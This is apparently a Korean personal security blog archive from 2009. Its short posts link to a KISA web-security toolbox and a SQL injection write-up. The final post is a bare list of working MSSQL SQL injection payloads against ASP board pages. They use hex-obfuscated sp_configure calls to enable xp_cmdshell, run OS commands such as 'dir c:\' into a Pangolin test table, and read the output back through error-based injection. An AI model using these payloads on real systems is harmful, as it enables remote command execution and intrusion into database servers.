Posted by 김주일
Posted by 김주일
Posted by 김주일
어플리케이션/웹보안2009. 12. 23. 09:38

KISA에서 제공하는 웹보안을 위한 서비스들이 모여 있네.

링크 : http://toolbox.krcert.or.kr/
Posted by 김주일
어플리케이션/웹보안2009. 12. 20. 12:35
Posted by 김주일
어플리케이션/웹보안2009. 11. 17. 09:22
Posted by 김주일
언제 테스트 해보지..


출 처 : http://ptresearch.blogspot.com/2009/11/another-fine-method-to-exploit-sql.htm
Posted by 김주일
Posted by 김주일

/board_view.asp?num=50%20;exec%20sp_configure%200x41006400200048006f00630020004400690073007400720069006200750074006500640020005100750065007200690065007300,1;
reconfigure;
exec%20sp_configure%200x730068006f007700200061006400760061006e0063006500640020006f007000740069006f006e007300,1;
reconfigure;
exec%20sp_configure%200x780070005f0063006d0064007300680065006c006c00,1;
reconfigure;--

exec sp_configure 'Ad Hoc Distributed Queries',1;
reconfigure;
exec sp_configure 'show advanced options',1;
reconfigure;
exec sp_configure xp_cmdshell,1;
reconfigure;--

/bbs_view.asp?num=39%20;exec%20master.dbo.sp_addextendedproc%200x780070005f006400690072007400720065006500,%200x7800700073007400610072002e0064006c006c00--

 

/board_view.asp?num=50 ;create table [pangolin_test_table]([resulttxt] nvarchar(4000) null);--

/board_view.asp?num=50 ;declare @z nvarchar(4000) set @z=0xdir c:\ insert into [pangolin_test_table](resulttxt) exec master.dbo.xp_cmdshell @z;alter table

[pangolin_test_table] add id int not null identity (1,1)--

/board_view.asp?num=50 and (select cast(count(1) as varchar(8000))+char(94) from [web]..[pangolin_test_table])>0--

/board_view.asp?num=50 and (select top 1 case when resulttxt is null then char(124) else resulttxt+char(124) end  from [pangolin_test_table] order by [id])

>0--

/board_view.asp?num=50 and (select top 1 case when resulttxt is null then char(124) else resulttxt+char(124) end  from [pangolin_test_table] where id not in

(select top 2 id from [pangolin_test_table] order by [id]) )>0--

/board_view.asp?num=50 and (select top 1 case when resulttxt is null then char(124) else resulttxt+char(124) end  from [pangolin_test_table] where id not in

(select top 3 id from [pangolin_test_table] order by [id]) )>0--

/board_view.asp?num=50 and (select top 1 case when resulttxt is null then char(124) else resulttxt+char(124) end  from [pangolin_test_table] where id not in

(select top 4 id from [pangolin_test_table] order by [id]) )>0--

/board_view.asp?num=50 and (select top 1 case when resulttxt is null then char(124) else resulttxt+char(124) end  from [pangolin_test_table] where id not in

(select top 5 id from [pangolin_test_table] order by [id]) )>0--

Posted by 김주일